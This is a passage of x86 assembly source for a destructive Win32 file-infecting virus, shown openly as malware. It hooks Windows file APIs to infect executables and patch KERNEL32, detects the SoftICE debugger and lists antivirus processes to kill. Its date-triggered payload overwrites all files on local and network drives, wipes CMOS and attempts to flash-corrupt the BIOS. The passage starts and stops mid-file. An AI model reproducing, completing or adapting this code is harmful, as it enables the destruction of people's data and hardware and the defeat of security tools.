Align_EAX:
|
|
XOR EDX, EDX
|
|
DIV ECX
|
|
|
|
OR EDX, EDX
|
|
JZ Calc_Aligned
|
|
|
|
INC EAX
|
|
|
|
Calc_Aligned: MUL ECX
|
|
|
|
RET
|
|
|
|
|
|
Get_Delta:
|
|
CALL Get_EIP
|
|
Get_EIP: POP EBP
|
|
SUB EBP, (Get_EIP-START)
|
|
|
|
RET
|
|
|
|
|
|
Hook_CopyFileA:
|
|
|
|
MOV AL, ixCopyFileA
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_CreateFileA:
|
|
|
|
MOV AL, ixCreateFileA
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_CreateProcessA:
|
|
|
|
MOV AL, ixCreateProcessA
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_DeleteFileA:
|
|
|
|
MOV AL, ixDeleteFileA
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_GetFileAttributesA:
|
|
|
|
MOV AL, ixGetFileAttributesA
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_MoveFileA:
|
|
|
|
MOV AL, ixMoveFileA
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_MoveFileExA:
|
|
|
|
MOV AL, ixMoveFileExA
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_SetFileAttributesA:
|
|
|
|
MOV AL, ixSetFileAttributesA
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_CopyFileW:
|
|
|
|
MOV AL, ixCopyFileW
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_CreateFileW:
|
|
|
|
MOV AL, ixCreateFileW
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_CreateProcessW:
|
|
|
|
MOV AL, ixCreateProcessW
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_DeleteFileW:
|
|
|
|
MOV AL, ixDeleteFileW
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_GetFileAttributesW:
|
|
|
|
MOV AL, ixGetFileAttributesW
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_MoveFileW:
|
|
|
|
MOV AL, ixMoveFileW
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_MoveFileExW:
|
|
|
|
MOV AL, ixMoveFileExW
|
|
JMP Main_Dispatch
|
|
|
|
|
|
Hook_SetFileAttributesW:
|
|
|
|
MOV AL, ixSetFileAttributesW
|
|
|
|
Main_Dispatch: PUSH ESI
|
|
PUSH EBP
|
|
|
|
AND EAX, 000000FFh
|
|
|
|
CALL Get_Delta
|
|
|
|
JMP $
|
|
Busy_Switch = BYTE PTR $-1
|
|
|
|
; Set busy-flag to prevent re-entrancy.
|
|
|
|
MOV BYTE PTR [EBP+(Busy_Switch-START)], (Do_Old_Handler-Busy_Switch) - 1
|
|
|
|
; LODSB / NOP
|
|
|
|
MOV WORD PTR [EBP+(Unicode_Switch-START)], 90ACh
|
|
|
|
CMP AL, 08 ; Unicode function?
|
|
JB Do_Infect
|
|
|
|
; LODSW
|
|
|
|
MOV WORD PTR [EBP+(Unicode_Switch-START)], 0AD66h
|
|
|
|
Do_Infect: MOV ESI, [ESP+(3*4)] ; Infect the sucker.
|
|
CALL Infect_File
|
|
|
|
; Clear busy-flag.
|
|
|
|
MOV [EBP+(Busy_Switch-START)], AH
|
|
|
|
Do_Old_Handler: MOV EAX, [EBP+(API_Addresses-START)+(EAX*4)]
|
|
|
|
SUB EBP, [EBP+(Virus_RVA-START)]
|
|
|
|
ADD EAX, EBP
|
|
|
|
POP EBP
|
|
POP ESI
|
|
|
|
JMP EAX ; JMP to the original API.
|
|
|
|
|
|
|
|
Perform_API:
|
|
PUSH 0
|
|
Work_API_Index = BYTE PTR $-1
|
|
POP EAX
|
|
|
|
CMP [EBP+(Init_Mode-START)], AH
|
|
|
|
MOV EAX, [EBP+(API_Addresses-START)+(EAX*4)]
|
|
|
|
JZ Calc_K32_Base
|
|
|
|
Use_Init_Base: ADD EAX, 12345678h
|
|
K32_Base = DWORD PTR $-4
|
|
|
|
JMP EAX
|
|
|
|
Calc_K32_Base: ADD EAX, EBP
|
|
SUB EAX, [EBP+(Virus_RVA-START)]
|
|
|
|
JMP EAX
|
|
|
|
|
|
|
|
; ESI = ASCIIZ / returns AX = CRC16.
|
|
Calculate_CRC16:
|
|
PUSH EDX
|
|
PUSH ESI
|
|
|
|
PUSH 0FFFFFFFFh
|
|
POP EDX
|
|
|
|
CLD
|
|
|
|
Load_Character: LODSB
|
|
|
|
OR AL, AL
|
|
JZ Exit_Calc_CRC
|
|
|
|
XOR DL, AL
|
|
|
|
MOV AL, 8
|
|
|
|
CRC_Byte: SHR EDX, 1
|
|
JNC Loop_CRC_Byte
|
|
|
|
XOR EDX, 0EDB88320h
|
|
|
|
Loop_CRC_Byte: DEC AL
|
|
JNZ CRC_Byte
|
|
|
|
JMP Load_Character
|
|
|
|
Exit_Calc_CRC: XCHG EDX, EAX
|
|
|
|
POP ESI
|
|
POP EDX
|
|
|
|
RET
|
|
|
|
|
|
; Activates the payload if the current date is
|
|
; December 25th or when Soft-Ice is detected.
|
|
Check_For_Payload:
|
|
|
|
PUSHAD
|
|
|
|
; Try to detect the presence of Soft-Ice
|
|
; version 3.xx & 4.xx (9x/NT).
|
|
|
|
XOR EBX, EBX
|
|
|
|
PUSH EBX ; Soft-Ice's 9x driver is
|
|
PUSH EBX ; present?
|
|
PUSH OPEN_EXISTING
|
|
PUSH EBX
|
|
PUSH EBX
|
|
PUSH EBX
|
|
CALL @6
|
|
DB '\\.\SICE', 0
|
|
@6: PUSH ixCreateFileA
|
|
INT 03h
|
|
|
|
INC EAX ; Immediate retaliation!
|
|
JNZ Payload
|
|
|
|
PUSH EBX ; Soft-Ice's NT driver is
|
|
PUSH EBX ; present?
|
|
PUSH OPEN_EXISTING
|
|
PUSH EBX
|
|
PUSH EBX
|
|
PUSH EBX
|
|
CALL @7
|
|
DB '\\.\NTICE', 0
|
|
@7: PUSH ixCreateFileA
|
|
INT 03h
|
|
|
|
INC EAX ; Immediate retaliation!
|
|
JNZ Payload
|
|
|
|
MOV ESI, (Local_Time-Virus_End)
|
|
ADD ESI, [EBP+(Global_Handle-START)]
|
|
PUSH ESI
|
|
PUSH ixGetLocalTime
|
|
INT 03h
|
|
|
|
CMP BYTE PTR [ESI.Current_Month], 12
|
|
JNE Exit_Check_PL
|
|
|
|
CMP BYTE PTR [ESI.Current_Day], 25
|
|
JNE Exit_Check_PL
|
|
|
|
; Most likely we aren't yet connected to the network so it's
|
|
; better to wait some time before we start destroying.
|
|
|
|
INC BYTE PTR [EBP+(Delay_Timer-START)]
|
|
JZ Payload
|
|
|
|
Exit_Check_PL: POPAD
|
|
|
|
RET
|
|
|
|
Delay_Timer DB 0
|
|
|
|
; Let's get ready to r0ck..
|
|
Payload:
|
|
CALL Setup_Nuke_SEH
|
|
|
|
CALL Get_Delta
|
|
|
|
XOR EBX, EBX
|
|
|
|
MOV ESP, [ESP+(2*4)]
|
|
|
|
JMP Rest_Nuke_SEH
|
|
|
|
Setup_Nuke_SEH: PUSH DWORD PTR FS:[EBX]
|
|
MOV FS:[EBX], ESP
|
|
|
|
PUSH EAX ; Obtain IDT.
|
|
SIDT [ESP-2]
|
|
POP EAX
|
|
|
|
; Our ring-0 INT exception-handler.
|
|
|
|
LEA ECX, [EBP+(Ring0_Handler-START)]
|
|
|
|
XCHG [EAX+(3*8)], CX ; Set our own ring-0 handler.
|
|
|
|
ROR ECX, 16
|
|
|
|
XCHG [EAX+(3*8)+6], CX
|
|
|
|
INT 03h ; Raise ring-0 exception.
|
|
|
|
MOV [EAX+(3*8)+6], CX ; Restore original handler.
|
|
|
|
ROR ECX, 16
|
|
|
|
MOV [EAX+(3*8)], CX
|
|
|
|
Rest_Nuke_SEH: POP DWORD PTR FS:[EBX] ; Restore original SEH.
|
|
POP EAX
|
|
|
|
MOV EDI, [EBP+(Global_Handle-START)] ; Kill-list.
|
|
|
|
PUSH EDI
|
|
|
|
CALL @8 ; Load network-library.
|
|
DB 'MPR', 0
|
|
@8: PUSH ixLoadLibraryA
|
|
INT 03h
|
|
|
|
XCHG ECX, EAX ; Error?
|
|
JECXZ JECXZ_Enum_L
|
|
|
|
MOV EBX, ECX ; Save base in EBX.
|
|
|
|
CALL @9
|
|
DB 'WNetOpenEnumA', 0
|
|
@9: PUSH EBX
|
|
PUSH ixGetProcAddress
|
|
INT 03h
|
|
|
|
XCHG ECX, EAX
|
|
JECXZ Enum_Locals
|
|
|
|
MOV [EBP+(WNetOpenEnumA-START)], ECX
|
|
|
|
CALL @10
|
|
DB 'WNetEnumResourceA', 0
|
|
@10: PUSH EBX
|
|
PUSH ixGetProcAddress
|
|
INT 03h
|
|
|
|
XCHG ECX, EAX
|
|
JECXZ_Enum_L: JECXZ Enum_Locals
|
|
|
|
MOV [EBP+(WNetEnumResourceA-START)], ECX
|
|
|
|
CALL @11 ; Retrieve a find handle
|
|
Enum_Handle DD 0 ; to the system root.
|
|
@11: PUSH 0
|
|
PUSH 0
|
|
PUSH RESOURCETYPE_DISK
|
|
PUSH RESOURCE_CONNECTED
|
|
CALL [EBP+(WNetOpenEnumA-START)]
|
|
|
|
OR EAX, EAX
|
|
JNZ Enum_Locals
|
|
|
|
; Enumerate all active network-connections.
|
|
|
|
Retrieve_Enum: LEA ESI, [EBP+(Net_Resource-START)]
|
|
|
|
CALL @12
|
|
Buffer_Size DD 666
|
|
@12: PUSH ESI
|
|
CALL @13
|
|
Enum_Count DD 1
|
|
@13: PUSH DWORD PTR [EBP+(Enum_Handle-START)]
|
|
CALL [EBP+(WNetEnumResourceA-START)]
|
|
|
|
OR EAX, EAX
|
|
JNZ Enum_Locals
|
|
|
|
MOV ESI, [ESI+(5*4)] ; Found remote name.
|
|
|
|
CLD
|
|
|
|
Copy_Target: LODSB ; Copy the remote name to
|
|
STOSB ; our kill-list.
|
|
|
|
OR AL, AL ; Did the entire ASCIIZ ?
|
|
JNZ Copy_Target
|
|
|
|
JMP Retrieve_Enum
|
|
|
|
Enum_Locals: POP ESI ; Array of network-drives.
|
|
|
|
PUSH EDI ; Append local drives.
|
|
PUSH 256
|
|
PUSH ixGetLogicalDriveStringsA
|
|
INT 03h
|
|
|
|
Drive_Loop: PUSH ESI ; What kind of disk is this?
|
|
PUSH ixGetDriveTypeA
|
|
INT 03h
|
|
|
|
CMP AL, DRIVE_REMOVABLE ; Skip floppy-drives.
|
|
JE Find_Next_Str
|
|
|
|
CMP AL, DRIVE_CDROM ; Skip CD-ROM's.
|
|
JE Find_Next_Str
|
|
|
|
CMP AL, DRIVE_RAMDISK ; Skip RAM-disks.
|
|
JE Find_Next_Str
|
|
|
|
CALL_Trash_Dir: CALL Trash_Directory ; Trash the root including
|
|
; all it's sub-directories.
|
|
|
|
Find_Next_Str: CLD ; Fetch next byte.
|
|
LODSB
|
|
|
|
OR AL, AL ; Found the end of ASCIIZ ?
|
|
JNZ Find_Next_Str
|
|
|
|
CMP [ESI], AL
|
|
JNZ Drive_Loop ; Thank you DRIVE through :P
|
|
|
|
JMP $ ; Heart stops..
|
|
|
|
;-----------------------------------
|
|
; Overwrites all bytes in all files
|
|
; in all directories on all drives.
|
|
;-----------------------------------
|
|
Trash_Directory:
|
|
|
|
PUSHAD
|
|
|
|
SUB ESP, (318+260+2) ; Reserve space on the stack,
|
|
; note that ESP must always
|
|
; point to a DWORD boundary.
|
|
|
|
LEA EAX, [ESP+318] ; Save our current directory.
|
|
PUSH EAX
|
|
PUSH 260
|
|
PUSH ixGetCurrentDirectoryA
|
|
INT 03h
|
|
|
|
CMP EAX, 260 ; Too big for our buffer?
|
|
JA JNZ_Exit_Trash
|
|
|
|
XCHG ECX, EAX ; Or the function failed?
|
|
JECXZ JNZ_Exit_Trash
|
|
|
|
PUSH ESI ; Change to found directory.
|
|
PUSH ixSetCurrentDirectoryA
|
|
INT 03h
|
|
|
|
DEC EAX ; Argh! something went wrong!
|
|
JNZ_Exit_Trash: JNZ Exit_Trash_Dir
|
|
|
|
XCHG EBX, EAX ; EBX = 0.
|
|
|
|
PUSH ESP ; Find us a victim.
|
|
CALL @14
|
|
DB '*.*', 0 ; Kill 'em all!
|
|
@14: PUSH ixFindFirstFileA
|
|
INT 03h
|
|
|
|
MOV EDI, EAX
|
|
|
|
INC EAX
|
|
JZ Close_Find
|
|
|
|
Destroy_Loop: LEA ESI, [ESP.FFN_File_Name]
|
|
|
|
; Is it a directory?
|
|
|
|
TEST BYTE PTR [ESP.File_Attributes], 00010000b
|
|
JZ Trash_File
|
|
|
|
CMP WORD PTR [ESI], '.' ; Fuck for '.'...
|
|
JE Find_Next_Crap
|
|
|
|
CMP WORD PTR [ESI], '..' ; Or '..'.
|
|
JNE Do_Trash_Dir
|
|
|
|
CMP [ESI+2], BL ; /0.
|
|
JZ Find_Next_Crap
|
|
|
|
Do_Trash_Dir: CALL Trash_Directory
|
|
|
|
JMP Find_Next_Crap
|
|
|
|
Trash_File: PUSH FILE_ATTRIBUTE_NORMAL ; Clear all it's attributes.
|
|
PUSH ESI
|
|
PUSH ixSetFileAttributesA
|
|
INT 03h
|
|
|
|
XCHG ECX, EAX
|
|
JECXZ Find_Next_Crap
|
|
|
|
PUSH EBX ; Open the target.
|
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|
PUSH OPEN_EXISTING
|
|
PUSH EBX
|
|
PUSH EBX
|
|
PUSH GENERIC_WRITE
|
|
PUSH ESI
|
|
PUSH ixCreateFileA
|
|
INT 03h
|
|
|
|
MOV ESI, EAX
|
|
|
|
INC EAX
|
|
JZ Find_Next_Crap
|
|
|
|
PUSH EBX ; Get it's filesize.
|
|
PUSH ESI
|
|
PUSH ixGetFileSize
|
|
INT 03h
|
|
|
|
; K, time to say ur prares..
|
|
|
|
PUSH EBX ; Nuke the S.O.B.
|
|
CALL @15
|
|
DD 0DEADBEEFh
|
|
@15: PUSH EAX
|
|
PUSH 444444h
|
|
PUSH ESI
|
|
PUSH ixWriteFile
|
|
INT 03h
|
|
|
|
; Wasted, time to seal the tomb..
|
|
|
|
PUSH ESI
|
|
PUSH ixCloseHandle
|
|
INT 03h
|
|
|
|
Find_Next_Crap: PUSH ESP
|
|
PUSH EDI
|
|
PUSH ixFindNextFileA
|
|
INT 03h
|
|
|
|
DEC EAX
|
|
JZ Destroy_Loop
|
|
|
|
Close_Find: PUSH EDI ; Close filehandle.
|
|
PUSH ixFindClose
|
|
INT 03h
|
|
|
|
LEA EAX, [ESP+318] ; Restore original directory.
|
|
PUSH EAX
|
|
PUSH ixSetCurrentDirectoryA
|
|
INT 03h
|
|
|
|
Exit_Trash_Dir: ADD ESP, (318+260+2) ; Clean-up our stackspace.
|
|
|
|
POPAD
|
|
|
|
RET
|
|
|
|
|
|
|
|
;-------------------------------------------------------
|
|
; Overwrite CMOS and attempt to flash the BIOS chipset.
|
|
;-------------------------------------------------------
|
|
Ring0_Handler:
|
|
PUSHFD
|
|
PUSHAD
|
|
|
|
CLI
|
|
|
|
MOV CL, 64 ; Take all 64 bytes of CMOS.
|
|
|
|
Nuke_CMOS_Byte: DEC CL ; We've did 'em all?
|
|
JS Nuke_BIOS
|
|
|
|
MOV AL, CL ; Request I/O to byte CL.
|
|
OUT 70h, AL
|
|
|
|
XOR AL, AL ; Trash the byte.
|
|
OUT 71h, AL
|
|
|
|
JMP Nuke_CMOS_Byte ; Repeat until all is done.
|
|
|
|
; The CIH BIOS-flasher should work on every Intel-board
|
|
; out there, which are becoming increasingly common.
|
|
; I have fully commented Pascal sources of how to flash
|
|
; Intel and other boards, available on request.
|
|
|
|
Nuke_BIOS: ; Show BIOS Page in 000E0000 - 000EFFFF (64k).
|
|
|
|
MOV EDI, 8000384Ch
|
|
MOV BP, 0CF8h
|
|
MOV DX, 0CFEh
|
|
CALL IOForEEPROM
|
|
|
|
; Show BIOS Page in 000F0000 - 000FFFFF (64k).
|
|
|
|
MOV DI, 0058h
|
|
DEC EDX
|
|
MOV WORD PTR [EBP+(Switch-START)], 0F24h ; AND AL, 0Fh
|
|
CALL IOForEEPROM
|
|
|
|
; ***********************
|
|
; * Show the BIOS Extra *
|
|
; * ROM Data in Memory *
|
|
; * 000E0000 - 000E01FF *
|
|
; * ( 512 Bytes ) *
|
|
; * , and the Section *
|
|
; * of Extra BIOS can *
|
|
; * be Writted... *
|
|
; ***********************
|
|
|
|
MOV EAX, 0E5555h
|
|
MOV ECX, 0E2AAAh
|
|
CALL EnableEEPROMToWrite
|
|
|
|
MOV BYTE PTR [EAX], 60h
|
|
|
|
PUSH ECX
|
|
|
|
LOOP $
|
|
|
|
; Destroy BIOS Extra ROM Data in 000E0000h - 000E007Fh, (80h bytes).
|
|
|
|
XOR AH, AH
|
|
MOV WORD PTR [EAX], 'RI' ; Dare yew go TU :P
|
|
|
|
XCHG ECX, EAX
|
|
|
|
LOOP $
|
|
|
|
; ***********************
|
|
; * Show and Enable the *
|
|
; * BIOS Main ROM Data *
|
|
; * 000E0000 - 000FFFFF *
|
|
; * ( 128 KB ) *
|
|
; * can be Writted... *
|
|
; ***********************
|
|
|
|
MOV EAX, 0F5555h
|
|
POP ECX
|
|
MOV CH, 0AAh
|
|
CALL EnableEEPROMToWrite
|
|
|
|
MOV BYTE PTR [EAX], 20h
|
|
|
|
LOOP $
|
|
|
|
; Destroy BIOS Main ROM Data in 000FE000h - 000FE07Fh (80h bytes).
|
|
|
|
MOV AH, 0E0h
|
|
MOV [EAX], AL
|
|
|
|
; Hide BIOS Page in 000F0000 - 000FFFFF (64k).
|
|
|
|
MOV WORD PTR [EBP+(Switch-START)], 100Ch ; or al,10h
|
|
CALL IOForEEPROM
|
|
|
|
POPAD
|
|
POPFD
|
|
|
|
IRETD
|
|
|
|
|
|
; Enable EEPROM to Write.
|
|
EnableEEPROMToWrite:
|
|
|
|
MOV [EAX], CL
|
|
MOV [ECX], AL
|
|
|
|
MOV BYTE PTR [EAX], 80h
|
|
MOV [EAX], CL
|
|
MOV [ECX], AL
|
|
|
|
RET
|
|
|
|
|
|
|
|
; I/O for EEPROM.
|
|
IOForEEPROM:
|
|
XCHG EDI, EAX
|
|
XCHG EDX, EBP
|
|
OUT DX, EAX
|
|
|
|
XCHG EDI, EAX
|
|
XCHG EDX, EBP
|
|
IN AL, DX
|
|
|
|
OR AL, 44h
|
|
Switch = WORD PTR $-2
|
|
|
|
XCHG EDI, EAX
|
|
XCHG EDX, EBP
|
|
OUT DX, EAX
|
|
|
|
XCHG EDI, EAX
|
|
XCHG EDX, EBP
|
|
OUT DX, AL
|
|
|
|
RET
|
|
|
|
|
|
; Returns random number between 0 and EAX-1.
|
|
Get_Random:
|
|
PUSHAD
|
|
|
|
XCHG EBX, EAX
|
|
|
|
PUSH ixGetTickCount
|
|
INT 03h
|
|
|
|
RCL EAX, 2
|
|
|
|
ADD EAX, 12345678h
|
|
Random_Seed = DWORD PTR $-4
|
|
|
|
ADC EAX, ESP
|
|
|
|
XOR EAX, ECX
|
|
|
|
XOR [EBP+(Random_Seed-START)], EAX
|
|
|
|
ADD EAX, [ESP-(13*4)]
|
|
|
|
RCL EAX, 1
|
|
|
|
XOR EDX, EDX
|
|
DIV EBX
|
|
|
|
ADD [EBP+(Random_Seed-START)], EDX
|
|
|
|
MOV [ESP+(7*4)], EDX
|
|
|
|
POPAD
|
|
|
|
OR EAX, EAX
|
|
|
|
RET
|
|
|
|
|
|
KERNEL32_Name DB '\KERNEL32.DLL', 0
|
|
|
|
Infected_K32 DB '\KRIZED.TT6', 0
|
|
|
|
API_Addresses: DD (Work_API_Count + Hook_API_Count) DUP(0)
|
|
|
|
Hook_Exports: DD Hook_API_Count DUP(0)
|
|
|
|
|
|
; EAX EBX ECX EDX ESI EDI EBP
|
|
ADD_Reg32: DB 0C0h, 0C3h, 0C1h, 0C2h, 0C6h, 0C7h, 0C5h
|
|
POP_Reg32: DB 058h, 05Bh, 059h, 05Ah, 05Eh, 05Fh, 05Dh
|
|
DEC_Reg32: DB 048h, 04Bh, 049h, 04Ah, 04Eh, 04Fh, 04Dh
|
|
MOV_Reg32: DB 0B8h, 0BBh, 0B9h, 0BAh, 0BEh, 0BFh, 0BDh
|
|
XOR_Ptr_Reg32 DB 0B0h, 0B3h, 0B1h, 0B2h, 0B6h, 0B7h, 0B5h
|
|
PUSH_Reg32: DB 050h, 053h, 051h, 052h, 056h, 057h, 055h
|
|
; ESP CS DS ES SS FLAGS
|
|
PUSH_Reg16_32 DB 054h, 00Eh, 01Eh, 006h, 016h, 09Ch
|
|
|
|
|
|
; API which we hook in order to intercept file-access.
|
|
|
|
Hook_API_CRC: CRC16 <CopyFileA>
|
|
CRC16 <CreateFileA>
|
|
CRC16 <CreateProcessA>
|
|
CRC16 <DeleteFileA>
|
|
CRC16 <GetFileAttributesA>
|
|
CRC16 <MoveFileA>
|
|
CRC16 <MoveFileExA>
|
|
CRC16 <SetFileAttributesA>
|
|
|
|
CRC16 <CopyFileW>
|
|
CRC16 <CreateFileW>
|
|
CRC16 <CreateProcessW>
|
|
CRC16 <DeleteFileW>
|
|
CRC16 <GetFileAttributesW>
|
|
CRC16 <MoveFileW>
|
|
CRC16 <MoveFileExW>
|
|
CRC16 <SetFileAttributesW>
|
|
|
|
; API which we need in order to function.
|
|
|
|
Work_API_CRC: CRC16 <CloseHandle>
|
|
CRC16 <CreateFileMappingA>
|
|
CRC16 <FindClose>
|
|
CRC16 <FindFirstFileA>
|
|
CRC16 <FindNextFileA>
|
|
CRC16 <GetCurrentDirectoryA>
|
|
CRC16 <GetDriveTypeA>
|
|
CRC16 <GetFileSize>
|
|
CRC16 <GetFileTime>
|
|
CRC16 <GetLastError>
|
|
CRC16 <GetLocalTime>
|
|
CRC16 <GetLogicalDriveStringsA>
|
|
CRC16 <GetProcAddress>
|
|
CRC16 <GetSystemDirectoryA>
|
|
CRC16 <GetTickCount>
|
|
CRC16 <GetWindowsDirectoryA>
|
|
CRC16 <GlobalAlloc>
|
|
CRC16 <GlobalFree>
|
|
CRC16 <LoadLibraryA>
|
|
CRC16 <MapViewOfFile>
|
|
CRC16 <SetCurrentDirectoryA>
|
|
CRC16 <SetFileTime>
|
|
CRC16 <UnmapViewOfFile>
|
|
CRC16 <WriteFile>
|
|
CRC16 <WritePrivateProfileStringA>
|
|
|
|
End_Work_API_CRC:
|
|
|
|
|
|
Dispatch_API: ; ANSI.
|
|
|
|
DW (Hook_CopyFileA-START)
|
|
DW (Hook_CreateFileA-START)
|
|
DW (Hook_CreateProcessA-START)
|
|
DW (Hook_DeleteFileA-START)
|
|
DW (Hook_GetFileAttributesA-START)
|
|
DW (Hook_MoveFileA-START)
|
|
DW (Hook_MoveFileExA-START)
|
|
DW (Hook_SetFileAttributesA-START)
|
|
|
|
; Unicode.
|
|
|
|
DW (Hook_CopyFileW-START)
|
|
DW (Hook_CreateFileW-START)
|
|
DW (Hook_CreateProcessW-START)
|
|
DW (Hook_DeleteFileW-START)
|
|
DW (Hook_GetFileAttributesW-START)
|
|
DW (Hook_MoveFileW-START)
|
|
DW (Hook_MoveFileExW-START)
|
|
DW (Hook_SetFileAttributesW-START)
|
|
|
|
|
|
; McAfee, AVP, NAV, and NOD-Ice.
|
|
Kill_Table: CRC16 <_AVP32.EXE>
|
|
CRC16 <_AVPCC.EXE>
|
|
CRC16 <_AVPM.EXE>
|
|
CRC16 <ALERTSVC.EXE>
|
|
CRC16 <AMON.EXE>
|
|
CRC16 <AVP32.EXE>
|
|
CRC16 <AVPCC.EXE>
|
|
CRC16 <AVPM.EXE>
|
|
CRC16 <N32SCANW.EXE>
|
|
CRC16 <NAVAPSVC.EXE>
|
|
CRC16 <NAVAPW32.EXE>
|
|
CRC16 <NAVLU32.EXE>
|
|
CRC16 <NAVRUNR.EXE>
|
|
CRC16 <NAVW32.EXE>
|
|
CRC16 <NAVWNT.EXE>
|
|
CRC16 <NOD32.EXE>
|
|
CRC16 <NPSSVC.EXE>
|
|
CRC16 <NRESQ32.EXE>
|
|
CRC16 <NSCHED32.EXE>
|
|
CRC16 <NSCHEDNT.EXE>
|
|
CRC16 <NSPLUGIN.EXE>
|
|
CRC16 <SCAN.EXE>
|
|
CRC16 <SMSS.EXE>
|
|
End_Kill_Table:
|
|
|
|
|
|
DB 'YOU CALL IT RELIGION, YOU''RE FULL OF SHIT', 0Dh
|
|
DB 'YOU NEVER KNEW, YOU NEVER DID, YOU NEVER WILL', 0Dh
|
|
DB 'YOU''RE SO FULL OF SHIT, I DON''T WANT TO HEAR IT', 0Dh
|
|
DB 'ALL YOU DO IS TALK ABOUT YOURSELF', 0Dh
|
|
DB 'I DON''T WANNA HEAR IT, COZ I KNOW NONE OF IT''S TRUE', 0Dh
|
|
DB 'I''M SICK AND TIRED OF ALL YOUR GODDAMN LIES', 0Dh
|
|
DB 'LIES IN THE NAME OF GOD', 0Dh
|
|
DB 'WHEN ARE YOU GOING TO REALIZE THAT I DON''T WANT TO HEAR IT?!', 0Dh
|
|
DB 'I KNOW YOU''RE SO FULL OF SHIT, SO SHUT YOUR FUCKING MOUTH', 0Dh
|
|
DB 'YOU KEEP ON TALKING, TALKING EVERYDAY', 0Dh
|
|
DB 'FIRST YOU''RE TELLING STORIES, THEN YOU''RE TELLING LIES', 0Dh
|
|
DB 'WHEN THE FUCK ARE YOU GOING TO REALIZE THAT I DON''T WANT TO HEAR IT!!', 0Dh
|
|
DB 'AH, SHUT THE FUCK UP...', 0Dh, 0
|
|
|
|
|
|
Virus_End:
|
|
|
|
Kill_List_Drives DB 256 DUP(0)
|
|
|
|
Net_Resource:
|
|
|
|
Clean_K32_Path DB 260 DUP(0)
|
|
Infected_K32_Path DB 260 DUP(0)
|
|
|
|
ANSI_Target_File DB 260 DUP(0)
|
|
|
|
Time_Creation DD 0
|
|
WNetOpenEnumA DD 0
|
|
Time_Last_Access DD 0
|
|
WNetEnumResourceA DD 0
|
|
Time_Last_Write DD 0
|
|
DD 0
|
|
|
|
Local_Time DW 8 DUP(0)
|
|
|
|
End_Heap:
|
|
|
|
|
|
Stupid_Dummy DB 0
|
|
|
|
|
|
POLY_START:
|
|
PUSH EAX ; This is where the host's
|
|
; VA address is placed.
|
|
|
|
PUSHFD ; Save all registers & flags.
|
|
PUSHAD
|
|
|
|
CALL @16 ; Check for presence of my
|
|
DB 'C:\VIRUS.TIR', 0 ; innoculation-file, as I
|
|
@16: CALL GetFileAttributesA ; run Soft-Ice myself.
|
|
|
|
INC EAX ; Nah it ain't T, so let's
|
|
JZ START ; go for it.
|
|
|
|
INT 01h ; Ack, we can't hurt daddy.
|
|
|
|
NOP
|
|
|
|
JMP $
|
|
|
|
Carrier:
|
|
PUSH 10h
|
|
CALL @17
|
|
DB 'Error!', 0
|
|
@17: CALL @18
|
|
DB 'Failed to initialize GRAPH32.DLL', 0
|
|
@18: PUSH 0
|
|
CALL MessageBoxA
|
|
|
|
PUSH 0 ; Back to the beast...
|
|
CALL ExitProcess
|
|
|
|
|
|
; The good old MZ-header...
|
|
|
|
MZ_Header STRUC
|
|
MZ_Mark DW 0
|
|
MZ_Image_Mod_512 DW 0
|
|
MZ_Image_512_Pages DW 0
|
|
MZ_Reloc_Items DW 0
|
|
MZ_Header_Size_Mem DW 0
|
|
MZ_Min_Size_Mem DW 0
|
|
MZ_Max_Size_Mem DW 0
|
|
MZ_Program_SS DW 0
|
|
MZ_Program_SP DW 0
|
|
MZ_Checksum DW 0
|
|
MZ_Program_IP DW 0
|
|
MZ_Program_CS DW 0
|
|
MZ_Reloc_Table DW 0
|
|
MZ_Header ENDS
|
|
|
|
|
|
PE_Header STRUC
|
|
PE_Mark DD 0 ; PE-marker (PE/0/0).
|
|
CPU_Type DW 0 ; Minimal CPU required.
|
|
Object_Count DW 0 ; Number of sections in PE.
|
|
PE_Date_Time DD 0 ; Date/time PE was build.
|
|
Reserved_1 DD 0
|
|
DD 0
|
|
NT_Header_Size DW 0
|
|
PE_Flags DW 0
|
|
DD 4 DUP(0)
|
|
EIP_RVA DD 0
|
|
DD 2 DUP(0)
|
|
Image_Base DD 0
|
|
Object_Align DD 0
|
|
File_Align DD 0
|
|
DW 0, 0
|
|
DW 0, 0
|
|
DW 0, 0
|
|
PE_Reserved_5 DD 0
|
|
Image_Size DD 0
|
|
Headers_Size DD 0
|
|
PE_Checksum DD 0
|
|
DW 0
|
|
DLL_Flags DW 0
|
|
PE_Header ENDS
|
|
|
|
|
|
Section_Header STRUC
|
|
Section_Name DB 8 DUP(0) ; Zero-padded section-name.
|
|
Section_Virtual_Size DD 0 ; Memory-size of section.
|
|
Section_RVA DD 0 ; Start section in memory.
|
|
Section_Physical_Size DD 0 ; Section-size in file.
|
|
Section_Physical_Offset DD 0 ; Section file-offset.
|
|
Section_Reserved_1 DD 0 ; Not used for executables.
|
|
Section_Reserved_2 DD 0 ; Not used for executables.
|
|
Section_Reserved_3 DD 0 ; Not used for executables.
|
|
Section_Flags DD 0 ; Flags of the section.
|
|
Section_Header ENDS
|
|
|
|
|
|
Find_First_Next_Win32 STRUC
|
|
File_Attributes DD 0
|
|
Creation_Time DD 0, 0
|
|
Last_Accessed_Time DD 0, 0
|
|
Last_Written_Time DD 0, 0
|
|
Find_File_Size_High DD 0
|
|
Find_File_Size_Low DD 0
|
|
Find_Reserved_1 DD 0
|
|
Find_Reserved_2 DD 0
|
|
FFN_File_Name DB 260 DUP(0)
|
|
Find_DOS_File_Name DB 14 DUP(0)
|
|
Find_First_Next_Win32 ENDS
|
|
|
|
|
|
Date_Time STRUC
|
|
Current_Year DW 0
|
|
Current_Month DW 0
|
|
Current_Day_Of_Week DW 0
|
|
Current_Day DW 0
|
|
Current_Hour DW 0
|
|
